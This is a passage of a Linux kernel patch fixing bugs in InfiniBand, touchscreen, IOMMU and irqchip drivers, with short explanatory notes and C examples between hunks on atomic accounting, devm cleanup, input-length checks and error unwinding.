+ 	int full;
+ 
+-	full = queue_full(rq->queue, QUEUE_TYPE_TO_DRIVER);
++	full = queue_full(rq->queue, QUEUE_TYPE_FROM_ULP);
+ 	if (unlikely(full))
+ 		return -ENOMEM;
+ 
+@@ -256,7 +256,7 @@ static int post_one_recv(struct rxe_rq *rq, const struct ib_recv_wr *ibwr)
+ 	for (i = 0; i < num_sge; i++)
+ 		length += ibwr->sg_list[i].length;
+ 
+-	recv_wqe = queue_producer_addr(rq->queue, QUEUE_TYPE_TO_DRIVER);
++	recv_wqe = queue_producer_addr(rq->queue, QUEUE_TYPE_FROM_ULP);
+ 	recv_wqe->wr_id = ibwr->wr_id;
+ 
+ 	memcpy(recv_wqe->dma.sge, ibwr->sg_list,
+@@ -268,7 +268,7 @@ static int post_one_recv(struct rxe_rq *rq, const struct ib_recv_wr *ibwr)
+ 	recv_wqe->dma.cur_sge		= 0;
+ 	recv_wqe->dma.sge_offset	= 0;
+ 
+-	queue_advance_producer(rq->queue, QUEUE_TYPE_TO_DRIVER);
++	queue_advance_producer(rq->queue, QUEUE_TYPE_FROM_ULP);
+ 
+ 	return 0;
+ }
+@@ -623,17 +623,17 @@ static int post_one_send(struct rxe_qp *qp, const struct ib_send_wr *ibwr,
+ 
+ 	spin_lock_irqsave(&qp->sq.sq_lock, flags);
+ 
+-	full = queue_full(sq->queue, QUEUE_TYPE_TO_DRIVER);
++	full = queue_full(sq->queue, QUEUE_TYPE_FROM_ULP);
+ 
+ 	if (unlikely(full)) {
+ 		spin_unlock_irqrestore(&qp->sq.sq_lock, flags);
+ 		return -ENOMEM;
+ 	}
+ 
+-	send_wqe = queue_producer_addr(sq->queue, QUEUE_TYPE_TO_DRIVER);
++	send_wqe = queue_producer_addr(sq->queue, QUEUE_TYPE_FROM_ULP);
+ 	init_send_wqe(qp, ibwr, mask, length, send_wqe);
+ 
+-	queue_advance_producer(sq->queue, QUEUE_TYPE_TO_DRIVER);
++	queue_advance_producer(sq->queue, QUEUE_TYPE_FROM_ULP);
+ 
+ 	spin_unlock_irqrestore(&qp->sq.sq_lock, flags);
+ 
+@@ -821,12 +821,12 @@ static int rxe_poll_cq(struct ib_cq *ibcq, int num_entries, struct ib_wc *wc)
+ 
+ 	spin_lock_irqsave(&cq->cq_lock, flags);
+ 	for (i = 0; i < num_entries; i++) {
+-		cqe = queue_head(cq->queue, QUEUE_TYPE_FROM_DRIVER);
++		cqe = queue_head(cq->queue, QUEUE_TYPE_TO_ULP);
+ 		if (!cqe)
+ 			break;
+ 
+ 		memcpy(wc++, &cqe->ibwc, sizeof(*wc));
+-		queue_advance_consumer(cq->queue, QUEUE_TYPE_FROM_DRIVER);
++		queue_advance_consumer(cq->queue, QUEUE_TYPE_TO_ULP);
+ 	}
+ 	spin_unlock_irqrestore(&cq->cq_lock, flags);
+ 
+@@ -838,7 +838,7 @@ static int rxe_peek_cq(struct ib_cq *ibcq, int wc_cnt)
+ 	struct rxe_cq *cq = to_rcq(ibcq);
+ 	int count;
+ 
+-	count = queue_count(cq->queue, QUEUE_TYPE_FROM_DRIVER);
++	count = queue_count(cq->queue, QUEUE_TYPE_TO_ULP);
+ 
+ 	return (count > wc_cnt) ? wc_cnt : count;
+ }
+@@ -854,7 +854,7 @@ static int rxe_req_notify_cq(struct ib_cq *ibcq, enum ib_cq_notify_flags flags)
+ 	if (cq->notify != IB_CQ_NEXT_COMP)
+ 		cq->notify = flags & IB_CQ_SOLICITED_MASK;
+ 
+-	empty = queue_empty(cq->queue, QUEUE_TYPE_FROM_DRIVER);
++	empty = queue_empty(cq->queue, QUEUE_TYPE_TO_ULP);
+ 
+ 	if ((flags & IB_CQ_REPORT_MISSED_EVENTS) && !empty)
+ 		ret = 1;
+@@ -948,42 +948,6 @@ err1:
+ 	return ERR_PTR(err);
+ }
+ 
+-static int rxe_set_page(struct ib_mr *ibmr, u64 addr)
+-{
+-	struct rxe_mr *mr = to_rmr(ibmr);
+-	struct rxe_map *map;
+-	struct rxe_phys_buf *buf;
+-
+-	if (unlikely(mr->nbuf == mr->num_buf))
+-		return -ENOMEM;
+-
+-	map = mr->map[mr->nbuf / RXE_BUF_PER_MAP];
+-	buf = &map->buf[mr->nbuf % RXE_BUF_PER_MAP];
+-
+-	buf->addr = addr;
+-	buf->size = ibmr->page_size;
+-	mr->nbuf++;
+-
+-	return 0;
+-}
+-
+-static int rxe_map_mr_sg(struct ib_mr *ibmr, struct scatterlist *sg,
+-			 int sg_nents, unsigned int *sg_offset)
+-{
+-	struct rxe_mr *mr = to_rmr(ibmr);
+-	int n;
+-
+-	mr->nbuf = 0;
+-
+-	n = ib_sg_to_pages(ibmr, sg, sg_nents, sg_offset, rxe_set_page);
+-
+-	mr->page_shift = ilog2(ibmr->page_size);
+-	mr->page_mask = ibmr->page_size - 1;
+-	mr->offset = ibmr->iova & mr->page_mask;
+-
+-	return n;
+-}
+-
+ static ssize_t parent_show(struct device *device,
+ 			   struct device_attribute *attr, char *buf)
+ {
+diff --git a/drivers/infiniband/sw/rxe/rxe_verbs.h b/drivers/infiniband/sw/rxe/rxe_verbs.h
+index 19ddfa8904803..c269ae2a32243 100644
+--- a/drivers/infiniband/sw/rxe/rxe_verbs.h
++++ b/drivers/infiniband/sw/rxe/rxe_verbs.h
+@@ -283,17 +283,6 @@ enum rxe_mr_lookup_type {
+ 	RXE_LOOKUP_REMOTE,
+ };
+ 
+-#define RXE_BUF_PER_MAP		(PAGE_SIZE / sizeof(struct rxe_phys_buf))
+-
+-struct rxe_phys_buf {
+-	u64      addr;
+-	u64      size;
+-};
+-
+-struct rxe_map {
+-	struct rxe_phys_buf	buf[RXE_BUF_PER_MAP];
+-};
+-
+ static inline int rkey_is_mw(u32 rkey)
+ {
+ 	u32 index = rkey >> 8;
+@@ -310,25 +299,24 @@ struct rxe_mr {
+ 	u32			lkey;
+ 	u32			rkey;
+ 	enum rxe_mr_state	state;
+-	u32			offset;
+ 	int			access;
++	atomic_t		num_mw;
+ 
+-	int			page_shift;
+-	int			page_mask;
+-	int			map_shift;
+-	int			map_mask;
++	unsigned int		page_offset;
++	unsigned int		page_shift;
++	u64			page_mask;
+ 
+ 	u32			num_buf;
+ 	u32			nbuf;
+ 
+-	u32			max_buf;
+-	u32			num_map;
+-
+-	atomic_t		num_mw;
+-
+-	struct rxe_map		**map;
++	struct xarray		page_list;
+ };
+ 
++static inline unsigned int mr_page_size(struct rxe_mr *mr)
++{
++	return mr ? mr->ibmr.page_size : PAGE_SIZE;
++}
++
+ enum rxe_mw_state {
+ 	RXE_MW_STATE_INVALID	= RXE_MR_STATE_INVALID,
+ 	RXE_MW_STATE_FREE	= RXE_MR_STATE_FREE,
+diff --git a/drivers/infiniband/sw/siw/siw_mem.c b/drivers/infiniband/sw/siw/siw_mem.c
+index b2b33dd3b4fa1..f51ab2ccf1511 100644
+--- a/drivers/infiniband/sw/siw/siw_mem.c
++++ b/drivers/infiniband/sw/siw/siw_mem.c
+@@ -398,7 +398,7 @@ struct siw_umem *siw_umem_get(u64 start, u64 len, bool writable)
+ 
+ 	mlock_limit = rlimit(RLIMIT_MEMLOCK) >> PAGE_SHIFT;
+ 
+-	if (num_pages + atomic64_read(&mm_s->pinned_vm) > mlock_limit) {
++	if (atomic64_add_return(num_pages, &mm_s->pinned_vm) > mlock_limit) {
+ 		rv = -ENOMEM;
+ 		goto out_sem_up;
+ 	}
+@@ -411,30 +411,27 @@ struct siw_umem *siw_umem_get(u64 start, u64 len, bool writable)
+ 		goto out_sem_up;
+ 	}
+ 	for (i = 0; num_pages; i++) {
+-		int got, nents = min_t(int, num_pages, PAGES_PER_CHUNK);
+-
+-		umem->page_chunk[i].plist =
++		int nents = min_t(int, num_pages, PAGES_PER_CHUNK);
++		struct page **plist =
+ 			kcalloc(nents, sizeof(struct page *), GFP_KERNEL);
+-		if (!umem->page_chunk[i].plist) {
++
++		if (!plist) {
+ 			rv = -ENOMEM;
+ 			goto out_sem_up;
+ 		}
+-		got = 0;
++		umem->page_chunk[i].plist = plist;
+ 		while (nents) {
+-			struct page **plist = &umem->page_chunk[i].plist[got];
+-
+ 			rv = pin_user_pages(first_page_va, nents, foll_flags,
+ 					    plist, NULL);
+ 			if (rv < 0)
+ 				goto out_sem_up;
+ 
+ 			umem->num_pages += rv;
+-			atomic64_add(rv, &mm_s->pinned_vm);
+ 			first_page_va += rv * PAGE_SIZE;
++			plist += rv;
+ 			nents -= rv;
+-			got += rv;
++			num_pages -= rv;
+ 		}
+-		num_pages -= got;
+ 	}
+ out_sem_up:
+ 	mmap_read_unlock(mm_s);
+@@ -442,6 +439,10 @@ out_sem_up:
+ 	if (rv > 0)
+ 		return umem;
+ 
++	/* Adjust accounting for pages not pinned */
++	if (num_pages)
++		atomic64_sub(num_pages, &mm_s->pinned_vm);
++
+ 	siw_umem_release(umem, false);
+ 
+ 	return ERR_PTR(rv);
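
The siw_umem_get() change flips the pinned-page accounting from check-then-add to add-then-check: atomic64_add_return() charges the whole request up front, so two concurrent registrations can no longer both pass the rlimit comparison before either one adds, and the error path returns only the pages that were never actually pinned. The same reserve-then-rollback shape in standalone C11 (names are illustrative):

#include <stdatomic.h>
#include <stdbool.h>

static _Atomic long pinned_vm;

static bool reserve_pages(long want, long limit)
{
	/* fetch_add returns the old value, so add our share back in */
	if (atomic_fetch_add(&pinned_vm, want) + want > limit) {
		atomic_fetch_sub(&pinned_vm, want);	/* over limit: undo */
		return false;
	}
	return true;
}

static void unreserve_unpinned(long not_pinned)
{
	/* error path: give back the part that was never pinned */
	if (not_pinned)
		atomic_fetch_sub(&pinned_vm, not_pinned);
}
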
+diff --git a/drivers/input/touchscreen/exc3000.c b/drivers/input/touchscreen/exc3000.c
+index 4b7eee01c6aad..69eae79e2087c 100644
+--- a/drivers/input/touchscreen/exc3000.c
++++ b/drivers/input/touchscreen/exc3000.c
+@@ -109,6 +109,11 @@ static inline void exc3000_schedule_timer(struct exc3000_data *data)
+ 	mod_timer(&data->timer, jiffies + msecs_to_jiffies(EXC3000_TIMEOUT_MS));
+ }
+ 
++static void exc3000_shutdown_timer(void *timer)
++{
++	timer_shutdown_sync(timer);
++}
++
+ static int exc3000_read_frame(struct exc3000_data *data, u8 *buf)
+ {
+ 	struct i2c_client *client = data->client;
+@@ -386,6 +391,11 @@ static int exc3000_probe(struct i2c_client *client)
+ 	if (error)
+ 		return error;
+ 
++	error = devm_add_action_or_reset(&client->dev, exc3000_shutdown_timer,
++					 &data->timer);
++	if (error)
++		return error;
++
+ 	error = devm_request_threaded_irq(&client->dev, client->irq,
+ 					  NULL, exc3000_interrupt, IRQF_ONESHOT,
+ 					  client->name, data);
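
The exc3000 hunk applies the standard devm pattern for teardown that must run both on probe failure and on unbind: register the cleanup as a device-managed action immediately after the resource is initialised. Wrapping the destructor in a small helper with the exact void (*)(void *) signature, instead of casting it, keeps the call type-correct (the is31fl319x hunk further down makes the same fix for mutex_destroy, where such a cast breaks under control-flow-integrity checking). Generic shape, with placeholder names:

static void my_cleanup(void *res)
{
	/* e.g. timer_shutdown_sync(res) or mutex_destroy(res) */
}

static int my_setup(struct device *dev, void *res)
{
	/* ...initialise res here... */

	/* on registration failure, my_cleanup(res) is invoked immediately */
	return devm_add_action_or_reset(dev, my_cleanup, res);
}
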
+diff --git a/drivers/iommu/amd/init.c b/drivers/iommu/amd/init.c
+index 467b194975b30..19a46b9f73574 100644
+--- a/drivers/iommu/amd/init.c
++++ b/drivers/iommu/amd/init.c
+@@ -3475,15 +3475,26 @@ found:
+ 	return 1;
+ }
+ 
++#define ACPIID_LEN (ACPIHID_UID_LEN + ACPIHID_HID_LEN)
++
+ static int __init parse_ivrs_acpihid(char *str)
+ {
+ 	u32 seg = 0, bus, dev, fn;
+ 	char *hid, *uid, *p, *addr;
+-	char acpiid[ACPIHID_UID_LEN + ACPIHID_HID_LEN] = {0};
++	char acpiid[ACPIID_LEN] = {0};
+ 	int i;
+ 
+ 	addr = strchr(str, '@');
+ 	if (!addr) {
++		addr = strchr(str, '=');
++		if (!addr)
++			goto not_found;
++
++		++addr;
++
++		if (strlen(addr) > ACPIID_LEN)
++			goto not_found;
++
+ 		if (sscanf(str, "[%x:%x.%x]=%s", &bus, &dev, &fn, acpiid) == 4 ||
+ 		    sscanf(str, "[%x:%x:%x.%x]=%s", &seg, &bus, &dev, &fn, acpiid) == 5) {
+ 			pr_warn("ivrs_acpihid%s option format deprecated; use ivrs_acpihid=%s@%04x:%02x:%02x.%d instead\n",
+@@ -3496,6 +3507,9 @@ static int __init parse_ivrs_acpihid(char *str)
+ 	/* We have the '@', make it the terminator to get just the acpiid */
+ 	*addr++ = 0;
+ 
++	if (strlen(str) > ACPIID_LEN + 1)
++		goto not_found;
++
+ 	if (sscanf(str, "=%s", acpiid) != 1)
+ 		goto not_found;
+ 
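
The new strlen() guards in parse_ivrs_acpihid() exist because the kernel's sscanf %s conversion is unbounded and will write past a fixed-size buffer on oversized input, so the length has to be validated before parsing. A runnable userspace illustration of the guard-then-parse order (the ACPIID_LEN value is a stand-in, and the buffer here is sized with an extra byte for the terminating NUL):

#include <stdio.h>
#include <string.h>

#define ACPIID_LEN 16	/* stand-in, not the kernel's value */

static int parse_acpiid(const char *str)
{
	char acpiid[ACPIID_LEN + 1] = {0};

	/* reject anything that cannot fit *before* %s runs */
	if (str[0] != '=' || strlen(str + 1) > ACPIID_LEN)
		return -1;

	if (sscanf(str, "=%s", acpiid) != 1)
		return -1;

	printf("acpiid=%s\n", acpiid);
	return 0;
}

int main(void)
{
	return parse_acpiid("=AMDI0020:00") ? 1 : 0;
}
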
+diff --git a/drivers/iommu/amd/iommu.c b/drivers/iommu/amd/iommu.c
+index cbeaab55c0dbc..ff4f3d4da3402 100644
+--- a/drivers/iommu/amd/iommu.c
++++ b/drivers/iommu/amd/iommu.c
+@@ -558,6 +558,15 @@ static void amd_iommu_report_page_fault(struct amd_iommu *iommu,
+ 		 * prevent logging it.
+ 		 */
+ 		if (IS_IOMMU_MEM_TRANSACTION(flags)) {
++			/* Device not attached to domain properly */
++			if (dev_data->domain == NULL) {
++				pr_err_ratelimited("Event logged [Device not attached to domain properly]\n");
++				pr_err_ratelimited("  device=%04x:%02x:%02x.%x domain=0x%04x\n",
++						   iommu->pci_seg->id, PCI_BUS_NUM(devid), PCI_SLOT(devid),
++						   PCI_FUNC(devid), domain_id);
++				goto out;
++			}
++
+ 			if (!report_iommu_fault(&dev_data->domain->domain,
+ 						&pdev->dev, address,
+ 						IS_WRITE_REQUEST(flags) ?
+@@ -1702,27 +1711,29 @@ static int pdev_pri_ats_enable(struct pci_dev *pdev)
+ 	/* Only allow access to user-accessible pages */
+ 	ret = pci_enable_pasid(pdev, 0);
+ 	if (ret)
+-		goto out_err;
++		return ret;
+ 
+ 	/* First reset the PRI state of the device */
+ 	ret = pci_reset_pri(pdev);
+ 	if (ret)
+-		goto out_err;
++		goto out_err_pasid;
+ 
+ 	/* Enable PRI */
+ 	/* FIXME: Hardcode number of outstanding requests for now */
+ 	ret = pci_enable_pri(pdev, 32);
+ 	if (ret)
+-		goto out_err;
++		goto out_err_pasid;
+ 
+ 	ret = pci_enable_ats(pdev, PAGE_SHIFT);
+ 	if (ret)
+-		goto out_err;
++		goto out_err_pri;
+ 
+ 	return 0;
+ 
+-out_err:
++out_err_pri:
+ 	pci_disable_pri(pdev);
++
++out_err_pasid:
+ 	pci_disable_pasid(pdev);
+ 
+ 	return ret;
+@@ -2159,6 +2170,13 @@ static int amd_iommu_attach_device(struct iommu_domain *dom,
+ 	struct amd_iommu *iommu = rlookup_amd_iommu(dev);
+ 	int ret;
+ 
++	/*
++	 * Skip attaching the device to the domain if the new domain
++	 * is the same as the device's current domain
++	 */
++	if (dev_data->domain == domain)
++		return 0;
++
+ 	dev_data->defer_attach = false;
+ 
+ 	if (dev_data->domain)
+@@ -2387,12 +2405,17 @@ static int amd_iommu_def_domain_type(struct device *dev)
+ 		return 0;
+ 
+ 	/*
+-	 * Do not identity map IOMMUv2 capable devices when memory encryption is
+-	 * active, because some of those devices (AMD GPUs) don't have the
+-	 * encryption bit in their DMA-mask and require remapping.
++	 * Do not identity map IOMMUv2 capable devices when:
++	 *  - memory encryption is active, because some of those devices
++	 *    (AMD GPUs) don't have the encryption bit in their DMA-mask
++	 *    and require remapping.
++	 *  - SNP is enabled, because it prohibits DTE[Mode]=0.
+ 	 */
+-	if (!cc_platform_has(CC_ATTR_MEM_ENCRYPT) && dev_data->iommu_v2)
++	if (dev_data->iommu_v2 &&
++	    !cc_platform_has(CC_ATTR_MEM_ENCRYPT) &&
++	    !amd_iommu_snp_en) {
+ 		return IOMMU_DOMAIN_IDENTITY;
++	}
+ 
+ 	return 0;
+ }
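
The pdev_pri_ats_enable() fix above restores the canonical goto unwind ladder: each successfully acquired resource gets its own label, and a failure at step N releases steps N-1 down to 1 in reverse order. The old single out_err label disabled PRI and PASID even on paths where they had never been enabled. The general shape, with placeholder helpers assumed for illustration:

int enable_a(void); void disable_a(void);
int enable_b(void); void disable_b(void);
int enable_c(void);

int enable_three_things(void)
{
	int ret;

	ret = enable_a();
	if (ret)
		return ret;		/* nothing acquired yet */

	ret = enable_b();
	if (ret)
		goto out_disable_a;

	ret = enable_c();
	if (ret)
		goto out_disable_b;

	return 0;

out_disable_b:			/* unwind in reverse acquisition order */
	disable_b();
out_disable_a:
	disable_a();
	return ret;
}
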
+diff --git a/drivers/iommu/exynos-iommu.c b/drivers/iommu/exynos-iommu.c
+index b0cde22119875..c1d579c24740b 100644
+--- a/drivers/iommu/exynos-iommu.c
++++ b/drivers/iommu/exynos-iommu.c
+@@ -1446,7 +1446,7 @@ static int __init exynos_iommu_init(void)
+ 
+ 	return 0;
+ err_reg_driver:
+-	platform_driver_unregister(&exynos_sysmmu_driver);
++	kmem_cache_free(lv2table_kmem_cache, zero_lv2_table);
+ err_zero_lv2:
+ 	kmem_cache_destroy(lv2table_kmem_cache);
+ 	return ret;
+diff --git a/drivers/iommu/intel/iommu.c b/drivers/iommu/intel/iommu.c
+index 59df7e42fd533..52afcdaf7c7f1 100644
+--- a/drivers/iommu/intel/iommu.c
++++ b/drivers/iommu/intel/iommu.c
+@@ -4005,7 +4005,8 @@ int __init intel_iommu_init(void)
+ 		 * is likely to be much lower than the overhead of synchronizing
+ 		 * the virtual and physical IOMMU page-tables.
+ 		 */
+-		if (cap_caching_mode(iommu->cap)) {
++		if (cap_caching_mode(iommu->cap) &&
++		    !first_level_by_default(IOMMU_DOMAIN_DMA)) {
+ 			pr_info_once("IOMMU batching disallowed due to virtualization\n");
+ 			iommu_set_dma_strict();
+ 		}
+@@ -4346,7 +4347,12 @@ static size_t intel_iommu_unmap(struct iommu_domain *domain,
+ 	if (dmar_domain->max_addr == iova + size)
+ 		dmar_domain->max_addr = iova;
+ 
+-	iommu_iotlb_gather_add_page(domain, gather, iova, size);
++	/*
++	 * We do not use page-selective IOTLB invalidation in flush queue,
++	 * so there is no need to track page and sync iotlb.
++	 */
++	if (!iommu_iotlb_gather_queued(gather))
++		iommu_iotlb_gather_add_page(domain, gather, iova, size);
+ 
+ 	return size;
+ }
+@@ -4642,8 +4648,12 @@ static int intel_iommu_enable_sva(struct device *dev)
+ 		return -EINVAL;
+ 
+ 	ret = iopf_queue_add_device(iommu->iopf_queue, dev);
+-	if (!ret)
+-		ret = iommu_register_device_fault_handler(dev, iommu_queue_iopf, dev);
++	if (ret)
++		return ret;
++
++	ret = iommu_register_device_fault_handler(dev, iommu_queue_iopf, dev);
++	if (ret)
++		iopf_queue_remove_device(iommu->iopf_queue, dev);
+ 
+ 	return ret;
+ }
+@@ -4655,8 +4665,12 @@ static int intel_iommu_disable_sva(struct device *dev)
+ 	int ret;
+ 
+ 	ret = iommu_unregister_device_fault_handler(dev);
+-	if (!ret)
+-		ret = iopf_queue_remove_device(iommu->iopf_queue, dev);
++	if (ret)
++		return ret;
++
++	ret = iopf_queue_remove_device(iommu->iopf_queue, dev);
++	if (ret)
++		iommu_register_device_fault_handler(dev, iommu_queue_iopf, dev);
+ 
+ 	return ret;
+ }
+diff --git a/drivers/iommu/intel/pasid.c b/drivers/iommu/intel/pasid.c
+index fb3c7020028d0..9d2f05cf61648 100644
+--- a/drivers/iommu/intel/pasid.c
++++ b/drivers/iommu/intel/pasid.c
+@@ -128,6 +128,9 @@ int intel_pasid_alloc_table(struct device *dev)
+ 	pasid_table->max_pasid = 1 << (order + PAGE_SHIFT + 3);
+ 	info->pasid_table = pasid_table;
+ 
++	if (!ecap_coherent(info->iommu->ecap))
++		clflush_cache_range(pasid_table->table, size);
++
+ 	return 0;
+ }
+ 
+@@ -215,6 +218,10 @@ retry:
+ 			free_pgtable_page(entries);
+ 			goto retry;
+ 		}
++		if (!ecap_coherent(info->iommu->ecap)) {
++			clflush_cache_range(entries, VTD_PAGE_SIZE);
++			clflush_cache_range(&dir[dir_index].val, sizeof(*dir));
++		}
+ 	}
+ 
+ 	return &entries[index];
+@@ -364,6 +371,16 @@ static inline void pasid_set_page_snoop(struct pasid_entry *pe, bool value)
+ 	pasid_set_bits(&pe->val[1], 1 << 23, value << 23);
+ }
+ 
++/*
++ * Setup No Execute Enable bit (Bit 133) of a scalable mode PASID
++ * entry. It is required when XD bit of the first level page table
++ * entry is about to be set.
++ */
++static inline void pasid_set_nxe(struct pasid_entry *pe)
++{
++	pasid_set_bits(&pe->val[2], 1 << 5, 1 << 5);
++}
++
+ /*
+  * Setup the Page Snoop (PGSNP) field (Bit 88) of a scalable mode
+  * PASID entry.
+@@ -557,6 +574,7 @@ int intel_pasid_setup_first_level(struct intel_iommu *iommu,
+ 	pasid_set_domain_id(pte, did);
+ 	pasid_set_address_width(pte, iommu->agaw);
+ 	pasid_set_page_snoop(pte, !!ecap_smpwc(iommu->ecap));
++	pasid_set_nxe(pte);
+ 
+ 	/* Setup Present and PASID Granular Transfer Type: */
+ 	pasid_set_translation_type(pte, PASID_ENTRY_PGTT_FL_ONLY);
+diff --git a/drivers/iommu/iommu.c b/drivers/iommu/iommu.c
+index 5f6a85aea501e..50d858f36a81b 100644
+--- a/drivers/iommu/iommu.c
++++ b/drivers/iommu/iommu.c
+@@ -774,12 +774,16 @@ struct iommu_group *iommu_group_alloc(void)
+ 
+ 	ret = iommu_group_create_file(group,
+ 				      &iommu_group_attr_reserved_regions);
+-	if (ret)
++	if (ret) {
++		kobject_put(group->devices_kobj);
+ 		return ERR_PTR(ret);
++	}
+ 
+ 	ret = iommu_group_create_file(group, &iommu_group_attr_type);
+-	if (ret)
++	if (ret) {
++		kobject_put(group->devices_kobj);
+ 		return ERR_PTR(ret);
++	}
+ 
+ 	pr_debug("Allocated group %d\n", group->id);
+ 
+@@ -2124,8 +2128,22 @@ static int __iommu_attach_group(struct iommu_domain *domain,
+ 
+ 	ret = __iommu_group_for_each_dev(group, domain,
+ 					 iommu_group_do_attach_device);
+-	if (ret == 0)
++	if (ret == 0) {
+ 		group->domain = domain;
++	} else {
++		/*
++		 * To recover from the case where a device within the
++		 * group fails to attach to the new domain, we need to
++		 * force-attach all devices back to the old domain. The
++		 * old domain is compatible with all devices in the
++		 * group, hence the iommu driver should always return success.
++		 */
++		struct iommu_domain *old_domain = group->domain;
++
++		group->domain = NULL;
++		WARN(__iommu_group_set_domain(group, old_domain),
++		     "iommu driver failed to attach a compatible domain");
++	}
+ 
+ 	return ret;
+ }
+diff --git a/drivers/iommu/iommufd/device.c b/drivers/iommu/iommufd/device.c
+index d81f93a321afc..f6f42d8bc8ad8 100644
+--- a/drivers/iommu/iommufd/device.c
++++ b/drivers/iommu/iommufd/device.c
+@@ -346,10 +346,6 @@ int iommufd_device_attach(struct iommufd_device *idev, u32 *pt_id)
+ 		rc = iommufd_device_do_attach(idev, hwpt);
+ 		if (rc)
+ 			goto out_put_pt_obj;
+-
+-		mutex_lock(&hwpt->ioas->mutex);
+-		list_add_tail(&hwpt->hwpt_item, &hwpt->ioas->hwpt_list);
+-		mutex_unlock(&hwpt->ioas->mutex);
+ 		break;
+ 	}
+ 	case IOMMUFD_OBJ_IOAS: {
+diff --git a/drivers/iommu/iommufd/main.c b/drivers/iommu/iommufd/main.c
+index 083e6fcbe10ad..3fbe636c3d8a6 100644
+--- a/drivers/iommu/iommufd/main.c
++++ b/drivers/iommu/iommufd/main.c
+@@ -252,9 +252,12 @@ union ucmd_buffer {
+ 	struct iommu_destroy destroy;
+ 	struct iommu_ioas_alloc alloc;
+ 	struct iommu_ioas_allow_iovas allow_iovas;
++	struct iommu_ioas_copy ioas_copy;
+ 	struct iommu_ioas_iova_ranges iova_ranges;
+ 	struct iommu_ioas_map map;
+ 	struct iommu_ioas_unmap unmap;
++	struct iommu_option option;
++	struct iommu_vfio_ioas vfio_ioas;
+ #ifdef CONFIG_IOMMUFD_TEST
+ 	struct iommu_test_cmd test;
+ #endif
+diff --git a/drivers/iommu/iommufd/vfio_compat.c b/drivers/iommu/iommufd/vfio_compat.c
+index 3ceca0e8311c3..dba88ee1d4571 100644
+--- a/drivers/iommu/iommufd/vfio_compat.c
++++ b/drivers/iommu/iommufd/vfio_compat.c
+@@ -381,7 +381,7 @@ static int iommufd_vfio_iommu_get_info(struct iommufd_ctx *ictx,
+ 	};
+ 	size_t minsz = offsetofend(struct vfio_iommu_type1_info, iova_pgsizes);
+ 	struct vfio_info_cap_header __user *last_cap = NULL;
+-	struct vfio_iommu_type1_info info;
++	struct vfio_iommu_type1_info info = {};
+ 	struct iommufd_ioas *ioas;
+ 	size_t total_cap_size;
+ 	int rc;
+diff --git a/drivers/irqchip/irq-alpine-msi.c b/drivers/irqchip/irq-alpine-msi.c
+index 5ddb8e578ac6a..fc1ef7de37973 100644
+--- a/drivers/irqchip/irq-alpine-msi.c
++++ b/drivers/irqchip/irq-alpine-msi.c
+@@ -199,6 +199,7 @@ static int alpine_msix_init_domains(struct alpine_msix_data *priv,
+ 	}
+ 
+ 	gic_domain = irq_find_host(gic_node);
++	of_node_put(gic_node);
+ 	if (!gic_domain) {
+ 		pr_err("Failed to find the GIC domain\n");
+ 		return -ENXIO;
+diff --git a/drivers/irqchip/irq-bcm7120-l2.c b/drivers/irqchip/irq-bcm7120-l2.c
+index bb6609cebdbce..1e9dab6e0d86f 100644
+--- a/drivers/irqchip/irq-bcm7120-l2.c
++++ b/drivers/irqchip/irq-bcm7120-l2.c
+@@ -279,7 +279,8 @@ static int __init bcm7120_l2_intc_probe(struct device_node *dn,
+ 		flags |= IRQ_GC_BE_IO;
+ 
+ 	ret = irq_alloc_domain_generic_chips(data->domain, IRQS_PER_WORD, 1,
+-				dn->full_name, handle_level_irq, clr, 0, flags);
++				dn->full_name, handle_level_irq, clr,
++				IRQ_LEVEL, flags);
+ 	if (ret) {
+ 		pr_err("failed to allocate generic irq chip\n");
+ 		goto out_free_domain;
+diff --git a/drivers/irqchip/irq-brcmstb-l2.c b/drivers/irqchip/irq-brcmstb-l2.c
+index e4efc08ac5948..091b0fe7e3242 100644
+--- a/drivers/irqchip/irq-brcmstb-l2.c
++++ b/drivers/irqchip/irq-brcmstb-l2.c
+@@ -161,6 +161,7 @@ static int __init brcmstb_l2_intc_of_init(struct device_node *np,
+ 					  *init_params)
+ {
+ 	unsigned int clr = IRQ_NOREQUEST | IRQ_NOPROBE | IRQ_NOAUTOEN;
++	unsigned int set = 0;
+ 	struct brcmstb_l2_intc_data *data;
+ 	struct irq_chip_type *ct;
+ 	int ret;
+@@ -208,9 +209,12 @@ static int __init brcmstb_l2_intc_of_init(struct device_node *np,
+ 	if (IS_ENABLED(CONFIG_MIPS) && IS_ENABLED(CONFIG_CPU_BIG_ENDIAN))
+ 		flags |= IRQ_GC_BE_IO;
+ 
++	if (init_params->handler == handle_level_irq)
++		set |= IRQ_LEVEL;
++
+ 	/* Allocate a single Generic IRQ chip for this node */
+ 	ret = irq_alloc_domain_generic_chips(data->domain, 32, 1,
+-			np->full_name, init_params->handler, clr, 0, flags);
++			np->full_name, init_params->handler, clr, set, flags);
+ 	if (ret) {
+ 		pr_err("failed to allocate generic irq chip\n");
+ 		goto out_free_domain;
+diff --git a/drivers/irqchip/irq-mvebu-gicp.c b/drivers/irqchip/irq-mvebu-gicp.c
+index fe88a782173dd..c43a345061d53 100644
+--- a/drivers/irqchip/irq-mvebu-gicp.c
++++ b/drivers/irqchip/irq-mvebu-gicp.c
+@@ -221,6 +221,7 @@ static int mvebu_gicp_probe(struct platform_device *pdev)
+ 	}
+ 
+ 	parent_domain = irq_find_host(irq_parent_dn);
++	of_node_put(irq_parent_dn);
+ 	if (!parent_domain) {
+ 		dev_err(&pdev->dev, "failed to find parent IRQ domain\n");
+ 		return -ENODEV;
+diff --git a/drivers/irqchip/irq-ti-sci-intr.c b/drivers/irqchip/irq-ti-sci-intr.c
+index fe8fad22bcf96..020ddf29efb80 100644
+--- a/drivers/irqchip/irq-ti-sci-intr.c
++++ b/drivers/irqchip/irq-ti-sci-intr.c
+@@ -236,6 +236,7 @@ static int ti_sci_intr_irq_domain_probe(struct platform_device *pdev)
+ 	}
+ 
+ 	parent_domain = irq_find_host(parent_node);
++	of_node_put(parent_node);
+ 	if (!parent_domain) {
+ 		dev_err(dev, "Failed to find IRQ parent domain\n");
+ 		return -ENODEV;
+diff --git a/drivers/irqchip/irqchip.c b/drivers/irqchip/irqchip.c
+index 3570f0a588c4b..7899607fbee8d 100644
+--- a/drivers/irqchip/irqchip.c
++++ b/drivers/irqchip/irqchip.c
+@@ -38,8 +38,10 @@ int platform_irqchip_probe(struct platform_device *pdev)
+ 	struct device_node *par_np = of_irq_find_parent(np);
+ 	of_irq_init_cb_t irq_init_cb = of_device_get_match_data(&pdev->dev);
+ 
+-	if (!irq_init_cb)
++	if (!irq_init_cb) {
++		of_node_put(par_np);
